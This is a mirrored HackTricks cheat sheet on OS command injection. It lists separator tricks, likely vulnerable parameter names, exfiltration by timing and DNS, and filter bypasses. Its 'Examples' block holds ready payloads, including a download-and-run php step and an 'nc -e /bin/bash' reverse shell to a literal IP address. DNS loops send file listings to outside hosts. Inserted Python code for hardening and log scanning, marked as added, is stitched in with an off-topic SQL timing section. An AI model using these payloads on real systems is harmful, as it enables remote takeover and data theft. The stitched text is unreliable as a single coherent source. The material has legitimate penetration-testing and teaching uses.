mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
# Command Injection

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## What is command Injection?

A **command injection** permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.

### Context

Depending on **where your input is being injected** you may need to **terminate the quoted context** (using `"` or `'`) before the commands.

## Command Injection/Execution

```bash
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute the 2nd only if the 1st finishes OK
ls&id; ls &id; ls& id; ls & id # Execute both, but you can only see the output of the 2nd
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
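The separator table above seen from the application side, as an added example that is not from the HackTricks page: the same tainted value spliced into a shell string, passed as a single argv element, and rejected by an allow-list check. `echo` stands in for the real command (a ping helper, say) and the `*_lookup` names are hypothetical.

```python
"""Vulnerable vs. hardened handling of a user-supplied host value.

`echo` stands in for the real command so the example runs anywhere with a
POSIX /bin/sh; nothing here touches the network.
"""
import ipaddress
import re
import subprocess
from urllib.parse import unquote

# Separators and substitution syntax from the table above: || | && & ;
# newline (sent as %0A), backticks, $( ), ${ } (e.g. ${IFS}) and the < >
# redirections.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(|\$\{")


def contains_shell_meta(value: str) -> bool:
    """Flag a parameter value carrying shell separators or substitutions.
    URL-decoded first, so a %0A newline is caught as well as a literal one."""
    return SHELL_META.search(unquote(value)) is not None


def vulnerable_lookup(host: str) -> str:
    """'Before' form: the untrusted value is spliced into a shell command
    line, so a separator inside it ends the intended command and starts
    another one."""
    cmd = f"echo pinging {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_lookup(host: str) -> str:
    """No shell at all: the value is one argv element, so separators are
    inert and reach the program as literal text."""
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout


def hardened_lookup(host: str) -> str:
    """Allow-list validation plus argv: only a literal IP address is accepted.
    Validation is what keeps out inputs that are harmless to the shell but
    not to the program itself (option injection, hostnames that resolve
    elsewhere)."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        raise ValueError(f"rejected host value: {host!r}") from None
    return argv_lookup(host)


if __name__ == "__main__":
    tainted = "127.0.0.1; echo INJECTED"          # constructed sample input
    print(vulnerable_lookup(tainted), end="")      # second command runs
    print(argv_lookup(tainted), end="")            # printed literally, not run
    print(hardened_lookup("127.0.0.1"), end="")
    print(contains_shell_meta("127.0.0.1%0Aid"))   # True: %0A decodes to \n
```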

### **Bash** Bypasses

If you are trying to execute **arbitrary commands inside a Linux machine** you will be interested in reading about these **bypasses:**

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
{% endcontent-ref %}

### **Examples**

```
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
```

### Parameters

Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):

```
?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
```
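Added example, not part of the original page: a detection pass over web access-log lines that URL-decodes each query string, flags values carrying the separators from the table at the top of the page, and reports whether the parameter name is one of the 25 listed above. The log lines are constructed for the example and the log format assumed is Common Log Format.

```python
"""Scan access-log lines for command-injection attempts.

Every parameter value is checked for shell metacharacters; the 25 names
from the list above only rank the hit, they do not limit the check.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# The 25 parameter names from the list above.
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
    "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
    "function", "req", "feature", "exe", "module", "payload", "run", "print",
}

# Shell separators and substitutions from the table at the top of the page.
SHELL_META = re.compile(r"[;&|`<>\n]|\$\(|\$\{")

# Common Log Format prefix: client, identd, user, timestamp, "METHOD target".
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)'
)


def flag_line(line: str):
    """Return (client, param, decoded value, name_in_top25) for each query
    parameter whose decoded value carries shell metacharacters; an empty
    list for a clean or unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes, so %0A is a real newline and %24%7B is ${
    # by the time the regex sees the value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SHELL_META.search(value):
            hits.append((m.group("client"), name, value,
                         name.lower() in SUSPECT_PARAMS))
    return hits


def scan(lines):
    """Run flag_line over an iterable of log lines and collect every hit."""
    return [hit for line in lines for hit in flag_line(line)]


# Constructed sample lines: benign, the recommended %0A separator on a
# listed name, ${IFS} on a listed name, a benign value on a listed name,
# and a ';' separator on a name that is not in the list.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Nov/2024:14:10:41 +0000] "GET /ping?host=10.0.0.1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Nov/2024:14:10:42 +0000] "GET /ping?ping=127.0.0.1%0Aid HTTP/1.1" 200 901',
    '198.51.100.7 - - [25/Nov/2024:14:10:43 +0000] "GET /tools?cmd=ls%24%7BIFS%7Did HTTP/1.1" 200 77',
    '10.0.0.9 - - [25/Nov/2024:14:10:44 +0000] "GET /search?query=command+injection HTTP/1.1" 200 2048',
    '203.0.113.4 - - [25/Nov/2024:14:10:45 +0000] "GET /ping?host=127.0.0.1%3Bid HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit on a listed name from a client that also appears with other listed names in a short window is the pattern the brute-force list further down produces.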

### Time based data exfiltration

Extracting data: char by char

#### Description

Time-based data exfiltration is a technique used to extract data from a target system by sending requests that cause delays in the response time. This can be useful in scenarios where direct data leakage is not possible, but an attacker can still exploit vulnerabilities to extract information.

One approach to time-based data exfiltration is extracting data character by character. This involves sending requests that extract one character at a time from the target system's database or file system. By carefully crafting the requests and measuring the response time, an attacker can reconstruct the desired data.

#### Methodology

1. Identify the injection point: Find a vulnerable parameter where command injection is possible. This could be in a web application's input field, URL parameter, or any other user-controllable input.
2. Determine the character set: Understand the character set used by the target system's database or file system. This could be ASCII, Unicode, or any other encoding scheme.
3. Extract one character at a time: Craft a payload that extracts one character at a time from the target system. For example, in SQL injection, you can use the `SUBSTRING()` function to extract a specific character at a given position.
4. Measure the response time: Send the crafted payload and measure the response time. If the response time is significantly longer for a specific character, it indicates that the character is present in the target system.
5. Repeat the process: Iterate through all possible characters in the character set and extract the entire data by combining the characters that are present in the target system.

#### Example

Let's consider a web application that takes user input and performs a command execution without proper input validation. The vulnerable parameter is the `username` field, which is susceptible to command injection.

The attacker can craft a payload like the following to extract the username character by character. The payload shown is the SQL injection form of the technique; the shell form appears at the end of this section.

```
' UNION SELECT CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END --
```

By measuring the response time, the attacker can determine if the first character of the username is 'a'. By repeating this process for all possible characters, the attacker can extract the entire username.

#### Mitigation

To prevent time-based data exfiltration, it is important to implement proper input validation and sanitization techniques. Here are some mitigation measures:

- Use parameterized queries or prepared statements to prevent SQL injection attacks.
- Validate and sanitize user input to prevent command injection.
- Implement rate limiting or request throttling to detect and block suspicious requests.
- Regularly update and patch software to fix known vulnerabilities.
- Implement a web application firewall (WAF) to detect and block malicious requests.

By following these best practices, you can significantly reduce the risk of time-based data exfiltration attacks.

The same conditional delay on a shell, timing whether the first character of `whoami` matches a guess:

```
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s
```

### DNS based data exfiltration

Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
```
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```

```
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```

### Online tools to check for DNS based data exfiltration

* dnsbin.zhack.ca
* pingb.in

### Filtering bypass

#### Windows

```
powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
```

#### Linux

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
{% endcontent-ref %}

## Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}

## References

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
* [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
